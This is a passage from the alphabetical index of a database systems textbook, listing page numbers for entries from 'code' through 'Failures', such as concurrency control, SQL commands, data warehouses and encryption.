code, 19, 39-40, 57, 62, 77-78, 114, 191, 196,

207-209, 237-238, 243, 277-278, 319, 333,
336, 344, 375-376, 378, 402, 459, 464-468,
471, 473-474, 481-484, 491-492, 506, 522,
545, 547-549, 600-602, 612-613, 632, 634,
665, 670, 677-678, 684-685, 715, 736

described, 40, 191, 209, 237, 243, 482, 545, 549,
585

options for, 378, 464, 601
rate, 632

Code generator, 684-685
Coding, 5, 401, 839
Collection interface, 387-388
Collection type, 363, 374, 377, 386, 389
collision, 612-614, 619, 635

load factor, 635
open addressing, 613-614

color, 151, 208, 210, 281, 424, 496-497, 964-965
process, 493, 964
property, 585

columns, 9, 26, 87-88, 117, 152, 169, 189, 280, 348,
457, 474, 484, 495, 517, 544, 562, 668-669,
671, 674-676, 711, 895, 1016, 1058-1062,
1064

indexing, 348, 668-669, 671, 674-676
Command, 18, 84-85, 90, 102-105, 109, 134-136,

138-139, 424, 455, 459-467, 470-471, 474,
476, 496, 502-503, 740, 750, 763, 782, 820,
844-847, 857, 919, 936-937, 940

command line, 476
Commands, 36-40, 46, 49-51, 83, 102, 108, 137,

139-141, 333, 424, 434, 455-456, 458-460,
462-464, 466-468, 471-472, 481, 484,
493-494, 502, 505, 596, 604, 628-629, 633,
742, 747-748, 839, 857, 859, 872, 879,
891-893, 934, 983

atomic, 774
key, 83, 105, 137, 456, 462, 629, 633, 742, 839,

872
NET, 491
sql, 36-37, 51, 83, 102, 104-106, 108, 137,

139-141, 455-456, 458-460, 462-464,
466-468, 471-472, 481, 484, 502, 844,
857, 859, 872, 892-893, 934, 938

TYPE, 49-50, 140-141, 424, 434, 456, 459-460,
467-468, 472, 481, 505, 629, 742, 818,
839, 857, 859, 872

comment, 283, 561, 733, 964
comments, 245, 434, 492, 499, 514, 561
Commit, 467, 755-758, 760-762, 765, 772, 774-778,

785, 795-796, 811-812, 817-822, 824-825,
827-834, 863, 907-910, 912-914, 916-918,
920, 922, 937, 940

Commit point, 756, 758, 776, 811-812, 817-821, 830
Common Sense, 508
Communication devices, 42
Communications network, 839, 888
Community, 32, 273, 321, 335, 868, 1028
Comparison, 62, 87-88, 93, 100-101, 116-118, 120,

124, 130, 141, 150-151, 161-163, 179, 186,
438, 604, 616, 635, 718-719, 721, 953,
970-971, 996, 1000, 1035, 1060

comparison of, 62, 996, 1029
comparison operators, 93, 117-118, 120, 124, 141,

151, 161, 179, 186, 604, 970, 1060
Compatibility matrix, 801, 807
Compiler, 35, 38-40, 371, 684, 889-890
compiling, 465
Complementation rule, 575
complex systems, 313, 330, 773
Complex type, 19, 362
Component architecture, 889-890
components, 14, 38, 42, 44-46, 48, 61, 133, 184,

207-209, 212-213, 241, 283, 290-294, 311,
334-336, 340, 350, 355, 358-359, 362, 377,
390, 405-406, 410, 543, 629-630, 666,
716-717, 729, 881, 916, 919, 921, 951,
1019, 1030, 1048, 1054

components:, 133, 359, 390, 405-406, 410, 716, 951,
973, 1019

graphical, 350
Composite key, 211, 392, 666, 692, 736
Composite objects, 270, 417
Composition, 1018
Compression, 34, 41, 47, 436, 675, 964, 966

audio, 964
video, 964, 966

Computer, 1-2, 5-6, 10, 18, 25-26, 27-30, 38, 40-44,
47, 52, 54, 56-57, 85, 108, 112, 147, 209,
246, 282-283, 311-313, 319, 323, 332, 349,
352, 357-359, 404-409, 416, 425-426, 455,
458, 476, 487, 497-499, 505, 593, 600-601,
754, 792, 838-841, 857, 875, 914, 924,
995-996, 998, 1026

Computer networks, 44, 877, 924
access, 44, 877

Computer software, 282
computer systems, 282, 312, 359, 748, 838-839, 875
Computer-aided design (CAD), 25
Computers, 2-3, 7, 21-22, 27, 42, 273, 311-312, 491,

590, 593, 716, 995
data storage, 27, 590
function, 42, 716
parts, 22, 997
performance, 22, 312, 590

Computing systems, 877
concatenate, 87, 101, 553, 858
Concatenation, 87, 170, 207, 388, 666
conceptualization, 273, 1047
Concrete classes, 266-267
Concurrency, 11, 14, 20, 24, 39-40, 45, 106, 359, 599,

740, 747-749, 751-752, 755-756, 758-760,
767, 769, 771-774, 776-777, 779, 780-808,
811, 819-820, 835, 842, 875, 893, 905,
907-910, 912, 920, 922, 925

deadlock, 755, 781, 787-791, 793-794, 805-807,
820, 910, 925

mutual exclusion, 781
race conditions, 909
semaphores, 909
starvation, 781, 788, 791, 793, 806-807

Concurrency control, 11, 20, 24, 39-40, 45, 106, 359,
740, 747-749, 751-752, 755-756, 758-760,
767, 769, 771-774, 776-777, 779, 780-808,
811, 819-820, 835, 842, 875, 893, 905, 907,
909-910, 912, 922, 925

Condition, 49-50, 65, 73-74, 93, 95-97, 101-102, 104,
117-120, 123-124, 127-133, 140, 150-152,
156, 160-164, 172, 178-179, 181, 184-187,
253, 338-339, 403, 408, 438-440, 482-483,
493, 520, 524, 535, 537, 556-557, 559,
561-562, 567, 569, 582-583, 604-611, 616,
636, 666, 670, 673, 678, 690-694, 698-699,
711-714, 717-721, 727, 734, 743-744, 761,
772-773, 775-778, 793-794, 798, 860-861,
898, 905-907, 931-932, 934-940, 981, 1064

conditional, 93, 178, 440, 456, 458, 480, 482, 493,
495, 672, 1004

relational, 93, 178
conditioning, 755
Conditions, 19-20, 69, 77, 95, 100, 102, 117, 123, 126,

128-132, 136, 143, 149-150, 152, 162-164,
181-182, 187, 194, 236, 239, 296, 333, 360,
387, 410, 437-440, 460-461, 523-524, 535,
567, 604, 611, 629, 636, 646, 670, 690-693,
713, 719-721, 734, 736-737, 744-745, 754,
760-761, 772-774, 785, 855, 905-907, 909,
922, 936-938, 952-954, 966, 981, 983,
1060-1062, 1064

confidentiality, 837, 855, 860, 865, 871
Confidentiality of information, 860
Configuration, 48, 336, 595
Connection, 45, 155, 458, 460, 466-467, 472-473,

477-479, 628, 879, 918-919
connections, 81, 336, 458, 460, 472-473, 476, 627,

917, 920
Consistent state, 75, 758-759, 811, 829
Constant, 140, 150-151, 169, 179, 182, 185-187, 265,

381, 596, 687, 968, 970-971, 973-974, 978,
1004, 1060

Constants, 93, 187, 194, 549, 585, 969-970, 974,
1058-1059

named, 194
Constructor, 362-363, 366-367, 374, 378, 382, 390,

392, 401-402, 405, 415
constructors, 358, 361-364, 373-374, 377, 382, 386,

401-402, 412-413

overloaded, 373
Contacts, 858
content, 14, 314-316, 628, 855, 864, 868, 963-965,

967, 982-983, 988, 993-994, 997-998,
1017-1019, 1021, 1023-1027, 1029, 1031,
1033

media, 967, 982, 997
Contention, 739-740, 882
contiguous allocation, 603, 607
Continuation, 247, 467
Contract, 993
contrast, 8-10, 134, 148, 221, 256, 294, 353, 362, 491,

514, 592, 851, 965, 970, 1035-1036, 1048
control, 1, 11, 16, 20, 24, 35, 39-40, 43, 45, 84, 106,

222, 273, 310-312, 338-340, 344, 411, 467,
469-470, 479, 497, 548, 594, 629, 747-749,
751-752, 755-756, 758-760, 767, 769,
771-774, 776-777, 779, 780-808, 811-812,
819-820, 838-844, 848, 851-856, 861-863,
868-876, 878, 905, 907, 909-910, 921-922,
925, 958

execution, 39-40, 332, 359, 467, 740, 748-749,
751-752, 755-756, 759, 769, 774,
776-777, 781, 791, 797, 820, 830, 881,
893, 902, 905, 907

Label, 836, 853-854, 862, 869-873, 876
of flow, 836, 839, 862, 874
repetition, 897
transfer of, 751, 861-862

Control system, 43
controllers, 329
conversion, 37, 41, 82, 314, 329, 333, 858, 863, 1000
converting, 17, 82, 232, 281, 314, 329, 347, 380, 441,

446, 538, 709, 713-714, 728, 1011, 1025
web pages, 1011, 1025

Copyright, 1, 548, 920
Core, 83, 1029
costs, 20, 24-25, 311, 329, 591-592, 595, 692-693,

705, 715, 717, 719, 722, 724, 726, 728,
901-902, 907, 909, 914

overhead, 24-25, 705
software engineering, 329

CPU, 43, 589-590, 598, 716, 727, 765, 769, 882,
888-889, 901

secondary storage, 589-590, 716
Crawlers, 1022, 1027
Create index, 90, 106, 671-672, 737

create unique index, 672
Creating, 4, 9, 17, 34, 38, 80, 83, 103, 106, 135, 162,

251, 268, 300, 311, 348, 372, 376, 388-389,
392, 400-401, 414, 435-436, 446-447,
493-494, 500-502, 504-505, 583, 656-657,
688, 714, 803, 911, 947, 960, 1032, 1044

forms, 268, 329, 500, 502, 583, 737
views, 83, 106, 135, 140, 414, 441, 844, 847

CROSS JOIN, 124, 158, 160, 163
Cryptography, 875
CSS, 892
Currency, 50, 886, 998
current, 3, 19, 31, 35, 40, 47, 50-51, 55, 66-67, 69,

204-205, 208, 210, 212, 236, 238, 242, 247,
262-263, 268, 278, 350-351, 353-355, 362,
369, 381, 387, 392-393, 397, 414, 462-464,
469, 479, 542, 544, 604-606, 621, 627, 659,
773, 792-793, 823-824, 874, 898, 914-915,
926, 945-951, 982, 1021

Current position, 50
Customer, 3, 24, 46, 48, 62, 114, 192-193, 196, 201,

239-240, 243-244, 286, 303, 318-319, 323,
672, 861-862, 886, 956

customers, 37, 196, 243, 311, 318, 745, 956-957
cycle, 4, 310, 313-315, 317, 334, 351, 446, 555, 768,

771, 790-791, 807, 980
cylinders, 594, 606, 608, 631, 649

D
Dangling tuple, 572, 583
Data, 1-25, 27-36, 38-42, 45-54, 55-81, 82-89, 101,

105-108, 112, 133, 147, 148-149, 163, 173,
188-189, 191-194, 196-197, 201-245, 251,
259, 268-269, 273-275, 279, 282-285, 287,
295-296, 301, 303, 310-320, 328-336,
343-348, 351-353, 355-356, 357-365, 374,
380-382, 394, 400, 404, 411, 414, 416-417,
420-430, 441, 447-448, 457-462, 465, 476,
481, 494-496, 498, 500, 502, 520-522, 528,
542-543, 551, 579, 585, 588-600, 606-607,
612, 614, 617-618, 620-630, 636-638,
640-660, 662-663, 670, 673-676, 686, 688,

1070

705-707, 716-718, 725-727, 736-737,
739-742, 744-746, 749-752, 754-755,
759-760, 766-768, 772-774, 780-783,
794-799, 803-807, 810-814, 816, 824-825,
828-831, 841-842, 852-858, 860-865,
867-875, 877-883, 885-891, 893-895,
901-905, 909-916, 918-922, 924-927,
929-989, 991, 1008-1009, 1024-1033,
1034-1049, 1065

Double, 87, 210, 220-221, 223-224, 226-227, 382,
494-495, 588, 598, 629-630, 1052

hiding, 365, 879
Integer, 5, 9, 19, 57-58, 64, 87, 89, 211, 226, 346,

362-364, 411, 496, 600, 602, 617, 653,
774, 924, 971, 1024

integrity, 18-19, 24, 56, 64, 66, 69-77, 79, 85, 89,
107, 191, 197, 331, 355, 361, 441, 759,
868, 871, 883, 885, 973, 985, 1034

security threats, 836
Single, 5, 8, 11, 15, 20, 28, 36, 47-48, 58, 63,

65-66, 80, 87-88, 105, 133, 163, 189,
208-209, 212, 226-227, 229, 234, 251,
259, 295-296, 311, 330, 353, 400, 404,
428-430, 447, 476, 494-496, 520-522,
524, 543, 548, 593-595, 617, 623-625,
636-638, 647-649, 675, 717-718, 726,
745, 780, 816, 834, 848-849, 867, 897,
913-914, 959-960, 1022, 1028

validation, 313-314, 484, 772, 780, 794, 797-798,
805-806, 1028

Data abstraction, 8-11, 21, 28, 268-269, 275
Data communications, 42, 878, 924

trends, 42, 878
Data compression, 41, 47, 436, 675
Data cube, 1038-1039
Data cubes, 1037
Data definition language (DDL), 35, 51, 67
Data Encryption Standard (DES), 864
Data fields, 612
Data files, 9, 20, 40, 592, 598, 838
Data independence, 9-10, 21, 25, 27, 31, 33-34,

50-52, 879
Data Management Services, 46
Data manipulation language (DML), 35, 51
data mining, 23, 83, 496, 498, 867, 961-963, 982-983,

988, 1018, 1025, 1028, 1034-1036,
1045-1048

Data model, 7, 10, 19, 21, 28-30, 32-33, 47-48, 50-51,
53, 55-81, 148-149, 191-194, 197, 201,
203-204, 234, 236, 251, 285, 295-296,
315-317, 319-320, 331-332, 344-348, 351,
353, 381, 416-417, 421, 428, 430, 436, 441,
447, 457, 873, 881, 891, 957-958, 987,
1043-1044, 1047-1048, 1052

Data processing, 330, 623, 649
data security, 47, 836, 853
data sets, 623, 962
data storage, 27, 29, 32, 45, 344, 598, 674
Data structures, 6, 12, 17, 22-23, 54, 56, 75, 112, 147,

189, 364-365, 472, 487, 522, 588, 612, 614,
617, 622, 635, 648, 651, 675, 679, 688, 706,
988, 1044

data structures and, 17, 688, 988
Data transfer, 40, 481, 602, 625, 750, 902-904, 921

user, 903-904
Data transmission, 629
data type, 5, 19, 30, 57-58, 64, 72, 74, 87-89, 404,

460, 479, 600, 612, 638, 641, 945, 979,
1065

Character, 5, 57, 87-88, 429, 460, 612
Float, 64, 87, 460
Real, 57-58, 64, 87, 600, 945, 948

Data types, 3, 10, 22-23, 28, 32, 38, 48, 83-84, 87-88,
101, 106-107, 211, 347, 357, 360, 365, 374,
382, 394, 400, 411, 414, 429-430, 447, 472,
484, 494-495, 505, 600, 943, 956-957

Data warehouse, 1026, 1034-1037, 1041-1049
Data warehouses, 1, 626, 868, 1034-1037,

1041-1042, 1044-1049
Database, 1-26, 27-54, 55-81, 82-85, 91-94, 97, 99,

102-114, 115-117, 124-126, 131-134,
136-144, 147, 153, 160, 164-165, 168-169,
174, 177-178, 188, 190-200, 201-206,
209-214, 221-224, 226-228, 232-245,
252-253, 256-259, 261-264, 266-270, 273,
275-280, 282-284, 287-308, 309-356,
357-365, 367-368, 370-374, 381-382, 386,
389-396, 399-400, 402-404, 408, 411-419,
420-421, 424-425, 427, 430, 434-436,

441-453, 454-469, 471-473, 476-478,
480-481, 483-489, 490-507, 508-512, 514,
516, 520-521, 524-526, 528, 532, 542,
550-587, 597-598, 610, 621, 627, 629-630,
635, 636, 672, 679, 688, 727-728, 730-732,
733-746, 754-760, 765-767, 772-777, 789,
794, 797-801, 803-805, 836-876, 877-888,
896-898, 905, 907-908, 913-928, 936-937,
940-945, 947-948, 950-951, 953-956, 960,
962-964, 966, 968-969, 976-982, 984-990,
996-998, 1017, 1022-1024, 1029-1031,
1042-1043, 1045-1048, 1052

Database:, 72, 92, 102, 258, 447, 1045, 1064
management software, 25, 627, 907

Database administrator, 13, 310, 839, 841-842, 853,
950, 1047

database administrators, 13, 733-734, 1048
database design, 7, 13, 15-16, 18-19, 28, 30, 62, 79,

105, 201-204, 222-223, 232, 234, 236, 264,
267, 287-308, 309-356, 359, 400, 402, 413,
415, 508-510, 520-521, 524-525, 537-538,
542, 550-586, 592, 635, 733-746, 878-879,
894, 921, 1007, 1050

database management system (DBMS), 3
Database model, 204, 456-457, 480, 849
database query results, 495
Database schema, 30-31, 37, 51, 56, 66-72, 75-78,

84-85, 91, 107-111, 114, 134, 137-139,
141-144, 190-196, 199-200, 204, 214,
223-224, 227-228, 235, 238, 240, 242, 252,
261, 273, 275, 286, 287-289, 301, 305, 316,
344, 374, 394-395, 399, 402-403, 411, 413,
436, 441, 443, 448-450, 452-453, 459,
485-486, 506-507, 508, 520, 558-559, 570,
727, 731-732, 874, 927-928, 990

Database server, 40, 45-46, 311, 458, 471, 473,
480-481, 491, 501-502, 858, 892-893, 917

Database systems, 1-2, 8, 10, 17, 19, 21-22, 26, 27,
29-31, 38, 41-42, 50, 81, 188, 198, 268,
309-311, 351, 360, 362, 370, 408, 414,
416-417, 441, 500, 528, 605, 728, 730, 779,
814, 824, 848, 883-884, 886-887, 914-915,
925, 960, 982, 988, 994

connecting to, 500
database language, 454, 1065

database tables, 115, 140, 503, 846, 870
Databases, 1-26, 29, 33-34, 36-37, 46-48, 50, 53, 56,

63, 66, 75-76, 82, 105-106, 131, 198, 216,
268, 310-315, 319, 322, 330, 334-336,
344-345, 348-349, 351, 353, 355-356,
357-419, 420-421, 427, 435-436, 447,
457-458, 466, 471, 484, 493, 508-549,
559-562, 564, 567-568, 577-578, 584-585,
588-592, 622, 635, 674, 676, 679, 716-717,
747-749, 779, 785, 828-829, 835, 836-839,
856, 860, 871-876, 877-927, 940-943, 948,
950-952, 962-963, 981-984, 987-989, 998,
1021-1022, 1028-1029, 1043-1047

MySQL, 48, 106, 311, 491, 500, 746
Oracle, 33, 36-37, 106, 312, 436, 454-455, 466,

476, 491, 500, 746, 836, 869, 871-873,
875-876, 915-922, 931, 940, 955, 981,
984

PostgreSQL, 48, 106, 311
queries, 4-5, 7-8, 11, 13, 16-17, 21, 23, 26, 46, 66,

105-106, 115, 131, 149, 312, 353, 400,
402-404, 406-409, 413-415, 484, 516,
674, 716, 746, 860, 881-883, 886,
889-890, 892-894, 901-902, 905, 914,
922, 955-956, 963, 969, 982-984, 989,
996, 1034-1035, 1045-1046

queries in, 66, 115, 404, 415, 901
query language, 7, 13-14, 23, 36, 48, 149, 198,

359, 365, 380-381, 402, 413, 901, 954,
988, 1032

query results, 46, 50, 403-404, 471, 484, 892-893
querying, 3, 7, 13, 21, 37, 198, 380, 436, 447, 455,

493, 943, 951-952, 955-956, 982, 988,
1022, 1024

security of, 838, 883
SQLite, 500
support for, 48, 311, 909, 914-915, 917, 920, 955,

1008, 1045-1046
Datalog, 968, 970-974, 976-979, 982, 984, 986-987,

989
Date, 3, 8, 10, 15-16, 20, 31, 53, 67-68, 71, 77-79,

86-89, 92-93, 95, 100-101, 104, 110-111,
114, 116, 125, 135-136, 143-145, 151, 175,
179, 181, 187-188, 191-192, 197, 199-200,

205-206, 211-213, 220-223, 227-228, 230,
236, 238-239, 244, 253-254, 260, 262-264,
267, 275-276, 278-279, 288-291, 302-303,
305-308, 349, 356, 363-364, 366-367, 375,
382-383, 387, 389-393, 396, 411, 418-419,
420, 449-453, 507, 545-548, 587, 599-601,
609-610, 632, 677, 681, 731-732, 752, 792,
874, 902, 927-928, 952, 986, 1000

Date:, 228, 346, 356, 364, 366
between, 346
year, 364

date data type, 88
Dates, 88, 233, 237, 421, 490, 867, 942, 1010-1011,

1041, 1043
dBd, 549, 585
DBMS, 3-5, 7-20, 23-26, 27-28, 31, 33-52, 55, 67, 70,

73-75, 81, 85, 91, 103, 106-107, 109,
130-133, 135-137, 143, 189, 203-204, 237,
311-317, 319-320, 328-333, 340, 344,
351-353, 358, 413, 416, 436, 455-456, 461,
471, 480-482, 484, 486, 501-502, 622, 628,
673-674, 684-686, 692-693, 713, 716-717,
728, 730, 739-740, 748-750, 754-755,
757-759, 762-763, 771, 805, 810-815,
828-829, 837-840, 843-845, 858, 875,
882-885, 890, 915, 926, 929-932, 989

Deadlock, 755, 781, 787-791, 793-794, 805-807, 820,
910, 925

concurrency and, 925
detection, 788, 790, 805, 925
prevention, 788-790, 806
recovery, 755, 794, 807, 820, 910, 925

Deadlocks, 755, 792, 796, 807, 910
debugging, 465, 938
decimal, 57, 86-88, 103, 145, 354, 495
Declarations, 8, 91, 358, 368, 374, 386, 401, 411, 413,

459-460, 481
Decomposition, 322, 350, 509-510, 525, 528-530,

536-538, 541-543, 547-548, 552-553,
558-567, 570, 573-574, 576-577, 582-586,
738, 905, 907, 922, 925

Decryption, 47, 864-866
Decryption algorithm, 865
default, 65, 73-74, 87-91, 102-103, 105, 107, 123,

134, 137-139, 146, 229, 264, 268, 372, 378,
466-467, 574, 636, 737, 774, 853-854, 940

tool, 859
Default constructor, 367
Default value, 89, 91, 103
Default values, 103, 137
defining, 1-3, 8, 11, 18-19, 24, 35, 38, 56, 67, 86, 115,

134, 136-137, 139, 145, 235, 249, 251, 255,
259, 262, 266, 268, 274, 402, 581, 606, 761,
853, 918, 973, 975-976, 1029

delay, 596, 598, 625, 629, 631-632, 679, 796, 816,
1054-1056

queuing, 625
Delays, 48, 332, 591, 624, 882
deleting, 73-74, 255, 271, 328, 365, 610, 651, 654,

674, 932
files, 606, 610, 651, 674

Deletion, 35, 73, 83, 104, 107, 255, 338, 514, 520,
524, 543-544, 604-605, 607, 614-616, 619,
621, 629-630, 632-633, 635, 640-641, 651,
656, 659-660, 662, 664-665, 668, 674-675,
677, 679, 749, 1064-1065

Denial of service, 856, 858, 1027
Denial of service (DoS), 856
Dense index, 638, 645, 649, 676, 703, 741
Dependency preservation, 510, 525, 551, 558-559,

565-568, 573-574, 582-584, 586
deployment, 314, 334-336, 853, 1047, 1049

secure, 853
Descendant, 437-438, 651, 800
descending order, 102, 409, 999
design, 7, 12-16, 18-19, 22, 25, 27-28, 30, 32-34, 37,

41-43, 52, 56, 62, 64, 105, 109, 201-205,
212-214, 216, 222-224, 230, 232, 234-239,
241, 243-245, 246, 251-252, 258-259, 264,
269-270, 275-278, 283-285, 287-308,
309-356, 357-359, 399-402, 413, 415-417,
436, 508-511, 513-516, 518-521, 523-525,
528, 537-538, 540, 542-545, 550-586, 592,
626, 635, 686, 733-746, 773-774, 875,
878-879, 885-886, 894, 920-921, 926, 942,
957, 965, 981, 1027, 1042, 1044-1045,
1047-1049

of databases, 22, 246, 310, 334, 345, 348, 359,
400, 525, 885

1071

Design process, 202, 226, 234, 236, 259, 264,
316-317, 328, 332, 348-349, 351, 353, 359,
881

desktop, 48, 282, 995, 1034-1035
Desktops, 596, 995
development, 14-15, 20, 22, 33, 42, 186, 246, 310,

312, 318-319, 329-331, 334, 343, 347-348,
351-352, 355, 425, 430, 506, 510, 583, 623,
629, 877-878, 886, 908, 937, 1006,
1032-1033, 1047

services and, 882
devices, 20, 42-43, 588-593, 597, 622, 627-629, 635,

739-740, 868
Dictionaries, 355, 746
Dictionary, 3, 37, 39, 41, 45, 237, 273, 312, 333, 363,

385-386, 388-389, 411, 414, 675, 893, 919,
1007

Dictionary encoding, 675
Difference operation, 99, 176, 703
Digital, 23, 47, 106, 590, 598, 627, 836, 839, 854-855,

866-868, 873-874, 957, 993-994, 1017, 1032
technology, 47, 590, 598, 854, 1032

digital certificate, 866-867, 874
Digital library, 1032
Digital signature, 855, 866-867
Dimension, 495, 667, 954, 1037, 1039-1042
Direct access, 29, 884
Direction, 216, 229, 249, 258, 364, 390-391, 399-401,

878, 904, 914, 956-957, 959, 965, 987, 1052
orientation, 959, 965

Directories, 631, 823-824, 919, 921-922, 1017, 1022
directory, 37, 48, 502, 617-621, 630, 633, 641, 668,

682-683, 812-813, 823-824, 829-830, 856,
883, 891, 894, 919-920, 960

Dirty data, 752
DISCONNECT, 460
Discrete cosine transform, 964
Discretionary access control (DAC), 851, 870, 872
Disjoint subclasses, 298
Disk, 17-18, 21, 29, 34, 38, 40-41, 43-45, 60, 332-333,

547, 588-635, 636-638, 640-641, 644-645,
648-649, 653, 673-677, 688-690, 692,
694-695, 698-701, 705, 715-719, 721-723,
739, 749-751, 757-759, 769, 780, 798-799,
805, 810-816, 818-826, 828-830, 833-835,
887, 913

Disk access, 40, 622-623, 717
Disk controller, 596, 625
disk drive, 547, 595-596, 624, 631
disk drives, 329, 547, 589, 591, 595-596, 598, 624,

635
disk mirroring, 624-625, 631
Disks, 29, 43, 588-598, 623-626, 629-631, 635, 740,

755, 1054-1056
Distributed database, 570, 779, 828, 862, 877-879,

881-884, 886-888, 892, 894, 901, 905, 907,
910, 913-914, 916-917, 921-924, 926

Distributed processing, 877
systems, 877

distributed systems, 311, 878, 922, 925
issues, 878, 925

Division (/), 101
division, 8, 45, 101, 160, 164-167, 175, 284, 594, 611,

1003
division by, 611, 754, 1003
document, 14, 22, 24, 49, 202, 338, 423-430, 434-448,

495, 499-500, 855-856, 964, 996-1008,
1010-1017, 1020-1021, 1023-1024,
1029-1030, 1032

Document retrieval, 997, 999-1000
document view, 444
documentation, 312, 318-319, 329, 431, 434, 915-916
documents, 22, 24, 37, 53, 84, 87, 139-140, 273, 357,

420-421, 424-425, 427-428, 435-442,
447-448, 855-856, 914, 930, 963, 965, 982,
992-999, 1001-1009, 1011-1019, 1021,
1023-1024, 1031-1032

external, 24, 1017
navigating, 998
publishing, 22, 436
recent, 273, 1032

DOM, 58-60, 64, 156, 228, 356, 578
domain, 29, 57-59, 64, 69, 72, 74, 76, 85, 89-90, 125,

149-151, 156, 161, 177, 185-190, 194,
197-198, 229, 236, 238-239, 241, 268, 298,
324, 347-348, 401, 526-527, 551, 581, 583,
721, 868, 877, 904, 915, 917-918, 968, 971,
974, 977, 979, 1022-1023, 1025-1026, 1041,
1058-1060

Domain constraints, 64, 72, 76, 581
Domain name, 89, 229
Domain names, 917
Domains, 57-60, 64, 75, 84, 87, 89, 101, 125, 132,

138, 150-151, 186-187, 189, 235, 324, 578,
702, 773, 915, 966, 971, 998, 1041-1043

dot notation, 63, 366-367, 377, 380, 386, 404
dot operator, 1058
double, 87, 182, 210, 220-221, 223-224, 226-227,

254, 261, 339, 382, 437, 467, 469-470,
477-478, 494-495, 588, 598, 610, 629-633,
698, 708, 1052

Double buffering, 588, 598, 603, 610, 629-630,
632-633, 698

Double precision, 87, 382
downstream, 319
DRAM (dynamic RAM), 590
drawing, 70, 254, 268, 297, 307, 334
Drill-down, 1039-1040, 1045
Driver, 221, 260, 300, 308, 466, 476-478
Drivers, 45, 466, 476
Drives, 43, 329, 523, 547, 589-591, 595-596, 598,

624, 628, 635
DROP, 41, 104, 131, 135, 138-140, 186, 243, 341,

553, 844, 936
DROP TABLE, 104, 138, 140
DTD, 421, 427-430, 435-436, 447-448
Dual table, 858
Duplicate values, 125, 641
duration, 276, 357, 805, 853, 943-944, 987
DVDs, 3, 589, 591, 598
Dynamic SQL, 455, 458, 465, 471
dynamic web pages, 46, 421, 490-491, 493-494, 500,

504, 892, 1018

E
eBay, 242, 311
e-commerce, 22, 285, 420, 425, 855-856, 1018, 1026
edges, 182, 230, 422, 708, 767-769, 980, 1020, 1024
editing, 331
Effective, 311, 592, 634, 868, 946-950, 985, 1032,

1048
effects, 136, 319, 756, 759, 766, 808, 829-830, 875,

894, 907, 913
Levels, 759
standard, 319

electronics, 3
Element, 5, 58, 84-85, 138, 158, 170, 212, 341, 363,

377, 384-385, 387-389, 407-409, 425-429,
431-435, 437-438, 442-446, 496-497, 503,
557, 841, 877, 953

elements, 4, 8, 20, 39, 49, 60, 64, 84-85, 117,
137-139, 156, 336, 339, 363, 377, 387-389,
405, 407-410, 424-430, 433-440, 444, 448,
495-497, 505, 629, 877, 965, 1047,
1058-1059

form, 39, 363, 409, 439, 492, 497, 1059
of array, 389, 496

else, 462, 472, 475, 482-483, 492, 608, 613, 621,
660-661, 672, 696-697, 777, 784

ELSEIF, 482-483, 696-697
Email, 494
E-mail, 43, 244, 282-283, 628, 1010, 1027
Embedded systems, 25
embedding, 83, 455-456, 459, 466, 484, 859
Employment, 57, 205, 233, 376, 380
Empty set, 212, 265
encapsulation, 22, 358, 360-361, 365, 373-374, 400,

412, 414, 628
encoding, 34, 431, 675, 997, 1042
encryption, 47, 628, 836, 838-839, 842, 855, 863-866,

871, 873-875
confidentiality and, 855
symmetric, 836, 864-865, 873-874

End tag, 423-425, 428, 434, 491
Engineering, 2, 22, 26, 29, 41, 109, 201, 235, 255,

257, 259-261, 266, 299, 314, 332, 334-335,
344, 349, 355, 372, 926, 957

Enter key, 456
Entities, 19, 29, 31-32, 50, 62, 69, 202, 205-211,

214-221, 229-230, 232, 234, 249-255,
257-261, 264-266, 269-270, 273-274, 293,
297-298, 300, 319, 325, 344, 425, 446,
513-514, 577, 592, 599, 965, 995, 1011

Entity, 7, 19, 29, 56-58, 62, 64, 69-70, 72, 74, 76-77,
81, 85, 107, 131, 201-245, 246-286, 287,
289-296, 298-304, 310, 317, 320-325, 349,
355, 394-395, 401-402, 415, 421-422, 435,
446-447, 508-509, 513, 528, 532, 539, 599,

622, 1050-1052
Entity instances, 223, 250
Entity set, 209-212, 214, 216-217, 223, 229-230, 236,

247, 280
enum, 382-383, 391, 396-398
enumerated types, 362
Enumeration, 382
Environment, 4-5, 10, 12-15, 20, 25, 27, 38, 42, 85,

237, 313, 331, 334, 337, 351, 472-473, 801,
803, 822-824, 882, 885-887, 890, 904, 909,
916, 921, 925, 927, 1044-1046

environments, 18, 34, 41-42, 473, 831, 852, 868, 885,
1032

work, 42, 852, 1032
Equijoin, 123, 162, 164, 167, 189, 294-295, 297-298,

694, 921-922
Error, 16, 19, 319, 461, 467, 501-504, 623-626, 628,

684, 774-775, 859, 881, 1004, 1043
Error correction, 1043
Error detection, 625
Error messages, 502
errors, 19, 85, 119, 284, 344, 387, 460-461, 466-467,

483-484, 502, 624, 754, 774, 867, 901
Escape character, 100, 494
establishing, 460, 466, 917
Ethernet, 628-629
Event, 133, 276, 428, 816, 841, 869, 931-932,

934-936, 938, 940-941, 944, 954-955, 981
events, 2-3, 20, 106, 131-133, 276, 329, 509, 862,

868, 930-932, 934-938, 941, 943-944, 962,
981, 1006

Excel, 2, 311, 1045
Exception, 224, 367, 384-385, 387-389, 393, 407, 427,

460-461, 467, 474, 509
Exception handling, 467
exceptions, 117, 268-269, 387, 391-392, 461, 467,

480, 774
Exchanges, 748
Exclusive lock, 795, 800, 803
EXEC SQL, 456, 459-463, 465-466, 468, 775
Execution, 17-18, 34, 39-40, 42, 137, 166, 168, 177,

183, 332, 341, 359, 371, 455, 467, 473, 502,
590-591, 598-599, 684-687, 705-708,
714-717, 724, 726, 728-730, 737, 739-740,
742-743, 748-749, 751-757, 774, 776-777,
791, 797, 810, 815-816, 818, 820, 822-824,
833-834, 857, 883, 886, 893, 902, 904-905,
907-908, 924, 936-937, 968, 983

execution:, 39, 754
Execution

out-of-order, 881
taxonomy of, 730

EXISTS, 13, 33-34, 61, 72, 74, 103, 116, 120-123,
131, 174, 180, 185, 208, 212, 214, 226,
232-234, 350, 371-372, 400-401, 408-409,
423, 428, 469, 498-499, 530, 542, 581, 598,
623, 636, 641, 688, 692-694, 702-704,
721-722, 727, 735, 768-769, 790-791

Expert system, 351, 989
exposure, 854
Expressions, 109, 116, 148, 161, 177, 179, 185-186,

191, 198, 380, 403-409, 413-414, 437-439,
706, 708, 723, 742, 989, 1007, 1011

built-in, 413-414
External sort, 729
extracting, 8, 407, 409, 436, 441, 447, 484, 1011, 1018

pages, 1011, 1018

F
Fact table, 1040-1042
Factoring, 866
Fading, 51
Failures, 18, 360, 624-625, 747-748, 754-755, 757,

